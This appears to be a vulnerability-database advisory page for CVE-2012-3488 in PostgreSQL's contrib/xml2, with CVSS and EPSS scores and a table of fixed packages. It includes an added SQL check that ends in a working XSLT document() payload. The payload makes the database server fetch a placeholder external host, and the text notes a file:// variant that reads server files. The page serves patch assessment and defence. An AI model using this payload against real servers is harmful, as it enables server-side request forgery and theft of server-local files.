CVE-2012-3488
Description
The libxslt support in contrib/xml2 in PostgreSQL 8.3 before 8.3.20, 8.4 before 8.4.13, 9.0 before 9.0.9, and 9.1 before 9.1.5 does not properly restrict access to files and URLs, which allows remote authenticated users to modify data, obtain sensitive information, or trigger outbound traffic to arbitrary external hosts by leveraging (1) stylesheet commands that are permitted by the libxslt security options or (2) an xslt_process feature, related to an XML External Entity (aka XXE) issue.
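As a worked check for the three conditions the description ties together (an affected release, the contrib/xml2 module being installed and callable, and a stylesheet that makes the server fetch a file or URL), here is an added SQL example that is not part of this advisory or of the PostgreSQL project's own code. It assumes psql access to a test server you own, that contrib/xml2 is installed there, and uses probe.example.invalid as a placeholder for a callback host you control; the xslt_process() call is only to be run against such a test instance.

```sql
-- 1. Is this server in a release range listed for CVE-2012-3488?
--    server_version_num is a read-only setting available on every listed branch.
SELECT v AS server_version_num,
       CASE
         WHEN v BETWEEN 80300 AND 80319 THEN 'affected: 8.3 before 8.3.20'
         WHEN v BETWEEN 80400 AND 80412 THEN 'affected: 8.4 before 8.4.13'
         WHEN v BETWEEN 90000 AND 90008 THEN 'affected: 9.0 before 9.0.9'
         WHEN v BETWEEN 90100 AND 90104 THEN 'affected: 9.1 before 9.1.5'
         ELSE 'not in a range listed for CVE-2012-3488'
       END AS cve_2012_3488_status
FROM (SELECT current_setting('server_version_num')::int AS v) AS s;

-- 2. Is contrib/xml2's xslt_process present in this database, and may the current role run it?
--    An unprivileged role that can EXECUTE it is the "remote authenticated user" of the description.
--    oidvectortypes() and has_function_privilege() exist on 8.3 as well, where xml2 was loaded
--    from a SQL script rather than CREATE EXTENSION, so pg_extension is not consulted here.
SELECT n.nspname AS schema_name,
       p.proname,
       oidvectortypes(p.proargtypes) AS argument_types,
       has_function_privilege(current_user, p.oid, 'EXECUTE') AS callable_by_current_role
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
WHERE p.proname = 'xslt_process';

-- 3. Harmless probe for the "trigger outbound traffic to arbitrary external hosts" case.
--    The stylesheet calls the standard XSLT 1.0 document() function with an http URL. On an
--    unpatched server the backend process fetches it, so a listener on probe.example.invalid
--    (placeholder: substitute a host you control) sees a request whose source is the database
--    server. The same call with a file:// URL to a server-local XML file is the data-exposure case.
--    On a patched server libxslt's security options refuse the fetch and no request leaves the host.
SELECT xslt_process(
  '<probe/>',
  $xsl$<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:copy-of select="document('http://probe.example.invalid/cve-2012-3488')"/>
  </xsl:template>
</xsl:stylesheet>$xsl$
) AS fetched_content;
```

Read the result of step 3 on the listener, not in psql: the request is made whether or not the fetched body parses as XML, whereas the text returned by xslt_process is empty unless the listener answers with well-formed XML. Steps 1 and 2 are safe to run on production; step 3 is not.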
Risk Information
Base Score
10.0
CRITICAL on the CVSS 3.0 scale used by the vector below. Note that the vector's PR:N component assumes no privileges, whereas the description requires an authenticated database user, so treat this score as an upper bound.
Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Score
Exploitation Probability (EPSS estimate of exploitation activity within the next 30 days)
0.2
Associated Vulnerability
| Vulnerability | OS Platform |
|---|---|
| PostgreSQL 9.1.4 is affected by CVE-2012-3488 and CVE-2012-3489 | Windows |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 9.1.5 | Windows |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 9.0.9 | Windows |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 8.4.13 | Windows |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 8.3.20 | Windows |
| PostgreSQL 9.1.4 is affected by CVE-2012-3488 and CVE-2012-3489 | Linux |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 9.1.5 | Linux |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 9.0.9 | Linux |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 8.4.13 | Linux |
| CVE-2012-3488 and CVE-2012-3489 are fixed in PostgreSQL 8.3.20 | Linux |
| Postgresql-server update (ELSA-2024-10882) postgresql-server-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-pltcl update (ELSA-2024-10882) postgresql-pltcl-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-plpython update (ELSA-2024-10882) postgresql-plpython-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-plperl update (ELSA-2024-10882) postgresql-plperl-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-libs update (ELSA-2024-10882) postgresql-libs-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-libs update (ELSA-2024-10882) postgresql-libs-9.2.24-9.0.3.el7_9.i686.rpm | Linux |
| Postgresql-docs update (ELSA-2024-10882) postgresql-docs-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-devel update (ELSA-2024-10882) postgresql-devel-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-devel update (ELSA-2024-10882) postgresql-devel-9.2.24-9.0.3.el7_9.i686.rpm | Linux |
| Postgresql-contrib update (ELSA-2024-10882) postgresql-contrib-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql update (ELSA-2024-10882) postgresql-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql update (ELSA-2024-10882) postgresql-9.2.24-9.0.3.el7_9.i686.rpm | Linux |
| Postgresql-test update (ELSA-2024-10882) postgresql-test-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
Patch Details
No records found
References
https://nvd.nist.gov/vuln/detail/CVE-2012-3488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3488